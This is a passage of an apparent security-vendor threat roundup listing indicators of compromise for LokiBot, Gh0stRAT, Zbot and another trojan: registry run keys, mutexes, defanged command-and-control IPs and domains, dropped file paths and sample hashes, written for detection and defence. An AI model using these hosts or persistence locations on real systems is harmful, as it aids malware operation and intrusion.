\n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\dnscacheugc.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\bootcfg.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\bootcfg.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vssadmin.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\vssadmin.exe` | 1 \n`%System32%\\Tasks\\vssadmin` | 1 \n`%System32%\\Tasks\\bootcfg` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ctfmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ctfmon.exe` | 1 \n`%System32%\\Tasks\\ctfmon` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\resmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\resmon.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\newdev.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\newdev.exe` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\mfpmp.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\mfpmp.exe` | 1 \n`%System32%\\Tasks\\javaw` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\javaw.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\javaw.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TCPSVCS.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\TCPSVCS.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0e1509af88618c8cb273196c4213e26c2219c3a1fba9ed8c51a22d871e316ccc 1d07399e5b31727fc4dadba07d062f7eff6864e33f17fb1a65f71b9b41b61282 34a0f0bc799b5fd0cf9a89bce7d2ca2da158cf22940212b5c09fb1ec64bc9b65 4a60b63273210c8ebc4e6d07fba9b331011f852f4f5c1b5b1ae7ab5aa7df0f03 8a6c828f54dc34e260698e0347cce9e62d8fbc773e265c39c63e812201533724 8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5 b590d46794fad9c62040ce7941cf775282d1939c45267ec955e9be6ee8dd092a b8058ef9c3394ce2ea9318b06d6cf01080a0ad4ce87ee1cff78e57373192603e bbd6aadc606953b27f5592a2da7909949616b81b4f767ded89119644a71d2dd7 c8af6329fcfdfd4f9df33f2f4f59fb958e2416eebe8d78ab1444e763cf04d08c ce2b0b2037810060edbf86fc7ac78c5e0d4771b79181e39718498b02195e3642 efda569c35853456630d1e2fa27973aeb6386338f163ca0f60e3fbb4643a5b87 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lx6S7pKbz6Q/XeqOUZ3VHqI/AAAAAAAAC8o/cyN6FoqfhAgw5jQiPi349NHl0DvQpTvrwCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KERDNEosGOE/XeqOYBMYHHI/AAAAAAAAC8s/j8nmlt4BEZs4Bg_I5zMSYeV7w9qtOb8twCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.LokiBot-7420275-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 17 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE \nValue Name: LastDetectionTime ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION\\OPTIONS ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME\\OPTIONS ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\46646D0F2E8E990ABE331586D98FE95A61DC40D7CB2C05144A09FD8B956F7526.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674 ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 15 \n`eDZwOHM3` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]249[.]144[.]95` | 4 \n`185[.]55[.]225[.]242` | 3 \n`107[.]175[.]150[.]73` | 3 \n`185[.]159[.]153[.]129` | 2 \n`208[.]91[.]199[.]225` | 1 \n`104[.]16[.]154[.]36` | 1 \n`142[.]11[.]234[.]232` | 1 \n`185[.]53[.]90[.]10` | 1 \n`104[.]148[.]41[.]60` | 1 \n`185[.]132[.]53[.]138` | 1 \n`167[.]172[.]184[.]185` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`iranssp[.]ir` | 2 \n`beyondlogx[.]com` | 2 \n`whatismyipaddress[.]com` | 1 \n`phoenixdevs[.]ir` | 1 \n`kontrolreport[.]com` | 1 \n`offsolo-gbb[.]tech` | 1 \n`ray-den[.]xyz` | 1 \n`avertonbullk[.]com` | 1 \n`secure-n2[.]top` | 1 \n`smtp[.]betaflexllc[.]us` | 1 \n`protestlabsmovings[.]es` | 1 \n`oscontinental[.]online` | 1 \n`porno322[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1` | 15 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 15 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 15 \n`%HOMEPATH%\\subfolder` | 5 \n`%HOMEPATH%\\subfolder\\filename.exe` | 2 \n`%HOMEPATH%\\subfolder\\filename.vbs` | 2 \n`%HOMEPATH%\\subfolder\\quotation.exe` | 2 \n`%HOMEPATH%\\subfolder\\quotation.vbs` | 2 \n`%APPDATA%\\pid.txt` | 1 \n`%APPDATA%\\pidloc.txt` | 1 \n`%TEMP%\\holdermail.txt` | 1 \n`%TEMP%\\holderwb.txt` | 1 \n`%TEMP%\\bhvC037.tmp` | 1 \n`%HOMEPATH%\\subfolder\\payment.exe` | 1 \n`%HOMEPATH%\\subfolder\\payment.vbs` | 1 \n \n#### File Hashes\n\n` 02b5ef62978197b43a62d05de25c67a67cb1b4a0f09111e79cc83688e7881674 2374d2482bfecb87307d036b7e9750a0c28738c8a0afd4abf60a9b9ea3b81e83 2a3ad80cfac1cd63eeba8f7d8019df51df16e22ef34d2826d0aba9a56cff5c60 2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c 32f8e0daef5bb91fb0908277ad5f5d2c97398a64a8c9ff60611a103ba0d5004f 46646d0f2e8e990abe331586d98fe95a61dc40d7cb2c05144a09fd8b956f7526 4b4ba6c0f8cbadc871bcc6b3e175a569fe292973499bbf239aaaff7e75495888 548bacb5d7484fd4d4328579d18b3e62fdbf6bb7acdf6ade4ddcf6a0db61847b 7936c85dd96e641541e6e39e7a7388b8b6b16ef97569a81efceaed4abdc62ad6 938456e91538b5f4267bedb11d8cca26229f3dbdb3c24ff3a1132f3970c0d24a bb71b57a4cbf596fb6978df0e6fbdfbbbdebec8d182a62c6ecfbaa5261117aba c5bb3fd84e761402d2da77b8c0462e9f670f56d65f3ccd602cfb4326c98c4c9a c5f72bae432197bdbef019507fe69905549bbb7dcf9c455bd24e6eef008e96ea cbb00a83c374bcca6a2bf0cbfabaf1f5c655d9cb046437225bbbd04988f22811 df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e e329ca0b2964c410ba3c5d228a13b27d733d7f9999dee5a6511f91ea891473a9 ebe841b611a116cee961119df457aaa5f8b5ada4dc6e93381d59d2bb12bdf522 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Pdsl9gU3Dj0/XeqOqccKiII/AAAAAAAAC84/gZgpXFla-MwPhue5IftO9a_cPneeGrkqQCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rwpuc1aH2a0/XeqOuD03BqI/AAAAAAAAC88/rGe5osqIbpMY7NqD2eg-Bu4MK1IlxH7fwCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-QQGGtbApk_8/XeqOy42R62I/AAAAAAAAC9A/Q9SBHgcVTJkYg4NTtHQno0BQCiSUfObZACLcBGAsYHQ/s1600/2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Gh0stRAT-7414189-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EM ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Micro ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: SHR ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableDCOM ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableRemoteConnect ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA \nValue Name: restrictanonymous ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER \nValue Name: Enabled ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareWks ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareServer ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Depend ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71\\GAMESETTING ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ce ` | 1 \nMutexes | Occurrences \n---|--- \n`0x5d65r455f` | 25 \n`Mhost123.zz.am:6658` | 25 \n`host123.zz.am:6658` | 25 \n`107.163.241.193:6520` | 17 \n`M107.163.241.193:6520` | 17 \n`107.163.56.251:6658` | 12 \n`M107.163.56.251:6658` | 12 \n`{1B655094-FE2A-433c-A877-FF9793445069}` | 1 \n`Local\\https://pos.baidu.com/` | 1 \n`Global\\a80e8341-11ce-11ea-a007-00501e3ae7b5` | 1 \n`D` | 1 \n`CiM` | 1 \n`Crack iN Morroco 2k7` | 1 \n`174.139.81.2:3204` | 1 \n`M174.139.81.2:3204` | 1 \n`Global\\a9c98181-11ce-11ea-a007-00501e3ae7b5` | 1 \n`Local\\https://www.onlinedown.net/` | 1 \n`root em up` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]163[.]43[.]143` | 25 \n`107[.]163[.]43[.]235` | 25 \n`107[.]163[.]43[.]236` | 25 \n`49[.]7[.]37[.]126` | 23 \n`107[.]163[.]241[.]193` | 17 \n`107[.]163[.]241[.]185` | 15 \n`107[.]163[.]241[.]186` | 15 \n`107[.]163[.]56[.]251` | 12 \n`107[.]163[.]43[.]161` | 12 \n`107[.]163[.]56[.]240/31` | 12 \n`107[.]163[.]241[.]181` | 2 \n`107[.]163[.]43[.]144` | 2 \n`107[.]163[.]241[.]182` | 2 \n`204[.]79[.]197[.]200` | 1 \n`111[.]202[.]114[.]81` | 1 \n`104[.]192[.]110[.]245` | 1 \n`103[.]235[.]46[.]191` | 1 \n`180[.]163[.]251[.]231` | 1 \n`172[.]217[.]197[.]155` | 1 \n`185[.]10[.]104[.]120` | 1 \n`172[.]217[.]7[.]14` | 1 \n`218[.]30[.]115[.]123` | 1 \n`218[.]30[.]115[.]254` | 1 \n`39[.]156[.]66[.]108` | 1 \n`113[.]96[.]178[.]35` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`blogx[.]sina[.]com[.]cn` | 25 \n`blog[.]sina[.]com[.]cn` | 25 \n`host123[.]zz[.]am` | 25 \n`s[.]360[.]cn` | 1 \n`cpro[.]baidustatic[.]com` | 1 \n`flashservice[.]adobe[.]com` | 1 \n`www[.]beian[.]gov[.]cn` | 1 \n`zz[.]bdstatic[.]com` | 1 \n`dup[.]baidustatic[.]com` | 1 \n`www[.]google-analytics[.]com` | 1 \n`stats[.]g[.]doubleclick[.]net` | 1 \n`www[.]yisu[.]com` | 1 \n`js[.]users[.]51[.]la` | 1 \n`ia[.]51[.]la` | 1 \n`www[.]pcsoft[.]com[.]cn` | 1 \n`www[.]onlinedown[.]net` | 1 \n`si[.]trustutn[.]org` | 1 \n`e[.]so[.]com` | 1 \n`sqdownb[.]onlinedown[.]net` | 1 \n`www[.]idc400[.]com` | 1 \n`bgp[.]zzidc[.]com` | 1 \n`hj[.]dun[.]gsxzq[.]com` | 1 \n`news[.]onlinedown[.]net` | 1 \n`s[.]ssl[.]qhres[.]com` | 1 \n`uuid[.]users[.]51[.]la` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\1.txt` | 55 \n`%ProgramFiles%\\<random, matching '[a-z]{5,9}\\[a-z]{3,9}'>.dll` | 54 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 50 \n`%ProgramFiles%\\<random, matching '[a-z]{5,8}'>` | 49 \n`%ProgramFiles%\\<random, matching '[a-z]{5,9}\\[a-z]{3,9}'>.exe` | 39 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 11 \n`%TEMP%\\1.reg` | 2 \n`%ProgramFiles%\\korlu\\11221450` | 2 \n`%ProgramFiles%\\fsshxf\\11271508` | 2 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 2 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sxx` | 1 \n`\\tre.bat` | 1 \n`%TEMP%\\slseyc\\nfiav.dll` | 1 \n`\\a.bat` | 1 \n`%ProgramFiles%\\vpcat\\11271508` | 1 \n`%ProgramFiles%\\blzmv\\11271508` | 1 \n`%ProgramFiles%\\zuxlr\\11271508` | 1 \n`%ProgramFiles%\\hyabka\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre` | 1 \n`%ProgramFiles%\\yudusnhlp\\11271508` | 1 \n`%ProgramFiles%\\jkixqof\\11271508` | 1 \n`%ProgramFiles%\\yudusnhlp` | 1 \n`%ProgramFiles%\\tjsmc\\11271508` | 1 \n`%ProgramFiles%\\ezsor\\11271508` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00275609032024a2a413b2697b6763c964a5eeb54709ae803b68d5a77d1b46a4 019f88e9cc8c503c1ac8c6054beb978b445922cf5857f347bc8b2193a0592e82 037e1df212fbfc6c77ea55754f52b11366da8e0fd5437834762339a30e705614 04d5f107aa253ca81d99fce0201dcb6da6b21497fce62e2d37a90661951c63d8 06ee23a5be29f166749cd47784c9dafe66c0ca4ec7b70e6e837e59ccd5a02c63 072e4fa823cf7e9646dd7e1aaa3a308d9e789700dccffacfb646bf7c7fad9ad3 07ffdb94e32a95dc75d39528b3bddc362006719fc0970c47259fc8debeaee066 08e84db9a91341f82d0dc50775e75879fc2ac20ede3abffe53cf35dc9a656019 094797bbc7234e18f2a7a30fc182a690f2f7f7b080b889ab5e6c87bb730bc911 0a03aba2e42912a9c43e5cd9c724c4991007ecd6950bda27e82446070a08bb02 0a44d155b4568d97d161d18e90e4c9e719e4c37769c2a32ca5a41d56cc101172 0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9 0c7cf7681e128b45acaf925d598acf037177748402ab92fdf114a4d2dc5fd4ae 0dc8ab2ec624c65ff0c071b80b349c8e6de4fc4491e9751e099b63ce98c8c52e 0dd6bc63d982e053c01753cb5819362827bde9338b3d28a0b17669c0523489e0 0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806 1035eeb50c81c381f7b2909d062fb6d51d9e6ddc8c68478a3ef67d7b4a67b0f6 10eab7f3db36eacd08880c4998ab351c535f8b728cb0ed484edd0e84b5bdaf03 10fa3fefcb91d40da3285b063a8fd2c2f9187c1990689a487f1f2fea4a2e9240 12ebbeecf708d23ad4b4510374a622df85f5aaa806939204357f3d330b6de8d7 1439afcf233b1c829cbac8747623b3b05332ecd057660bc3639980ada64d1149 1466341e7ff5ca7511306ddd2253a03f5b81cfab21bda6ddd32047bd3f7e4011 14b65331773ad534dada9c7b055e34a1e6ab2a54f3d8eec4d1da6298f0477c71 1564fc8499c21f5426c4f15aaab34acc8936b43df39464f88003209c0ae3ea17 15c6ec4928627e4f9c56c567811e5b0b0b6c20b32374ac931257145d42365b61 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Mv4aRI8AOX8/XeqTi9dUmxI/AAAAAAAAC9U/5BPzI8obZRcDnb2-JaGVErWYRthcOb2gQCLcBGAsYHQ/s1600/0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-seXnCnM9VzQ/XeqToSRivVI/AAAAAAAAC9Y/ApMNoFB9Ha0my7yAD1iqEM5uQo3RIwnUACLcBGAsYHQ/s1600/9e933353f508b0e5e6c0dd8a5142a747729a30627f1997f494c17eb218e462bb_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DEtRJoer14o/XeqTtYUbPqI/AAAAAAAAC9c/djjY5iDb900bDRVCNY5DJaX-GFH5enZdQCLcBGAsYHQ/s1600/0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Zbot-7414153-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\PRIVACY \nValue Name: CleanCookies ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY \nValue Name: Sianile ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Uroxiqakh ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY ` | 1 \nMutexes | Occurrences \n---|--- \n`GLOBAL\\{<random GUID>}` | 1 \n`Local\\{<random GUID>}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`5[.]56[.]133[.]47` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\wbem\\Logs\\wbemprox.log` | 1 \n`%TEMP%\\tmp647c181c.bat` | 1 \n`%TEMP%\\tmp246f2f8d.bat` | 1 \n`%APPDATA%\\Adbe` | 1 \n`%APPDATA%\\Adbe\\udef.unu` | 1 \n`%APPDATA%\\Cukeba` | 1 \n`%APPDATA%\\Cukeba\\xoafe.idl` | 1 \n`%APPDATA%\\Olehse` | 1 \n`%APPDATA%\\Olehse\\okop.exe` | 1 \n`%APPDATA%\\Fireh\\isnib.exe` | 1 \n`%APPDATA%\\Igyg\\cuhia.obu` | 1 \n`%APPDATA%\\Igyg\\cuhia.tmp (copy)` | 1 \n \n#### File Hashes\n\n` 072bcc63bca4fa1946c71a3f9562a6d76af8fd1a5034132e2befbbde9aba9c98 15c235fefdfd798bff9bf039155762f0c0674cbf239c10df6aca52a7e2139488 2ccfd0f36677f438ff1120f21d6e5929d91531fd965dda6232ddd6de7a0c52d9 37403ce75f4908eb2e823a4e8c56c410e57441dde38c022819521a7fc3358701 40ecf36a4c2474cfff01980d68602d7bbaacfca2bdfda5ac58390b57c73b424a 522ce96681db4ef5d4731a8cf2007e7a46e650fc2f547f88d492700970b6af61 5409660ef23234d04ad204cb3791a96b3895286e258be036bfb43410e1dca08f 59b94ae4bdf3a3f4291e67e73316632b73a369391fbed4d8f3259d0ff0dc5468 66c6cb07d601f35490752227fe1d4687fbbc47af0f219eb178f89c670adccb0a 8914444fb30823c586d7df581c201dad5f1428284b7880395f2bc49ece5a1611 8daf28936db0201df94f89bd80acaae000fa018f93d6d1a1dc131b91be665382 8ea4ffdbfb16cd39bdf20a5a51ffbd6a523b78ad9a2c78bfffb46fcf0653f550 924f2ea483135213b988584241da5e5b8b152ab427fa933089e493d2dcd92c34 a807970fdd58b833a23e0c8b611a17ea5448399336f3ec0a3ecd5036486c0b08 b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619 b2787b4197407051f4a5fe4ddc6b483d3245222d0b6301ba67e7feae14b87342 b5f339fcebb67c4826f94c31eab0a3e8e8137a65204b03c8ee6a72a1a313a48e bf315e9e1ac06c214296722191b08a2925e5ed49dfcbba616606b8422047cb63 e014acc73e32e1d1cb74ab4049b46abb2bd5c06ee9d4c82aeca7f4440cbb011d e3ced6661c4f5fd339cba232c6693c79d30dd5bc8db5882e7a86e959537af18d f50b78d0ffed37ecbab524a44b4606ab7246711b3487af0a17343fb5fc93ffba fa58139b16a96c81b415d2cfe950fff73ca98ba9f0e09c753cb16cbb4b18b820 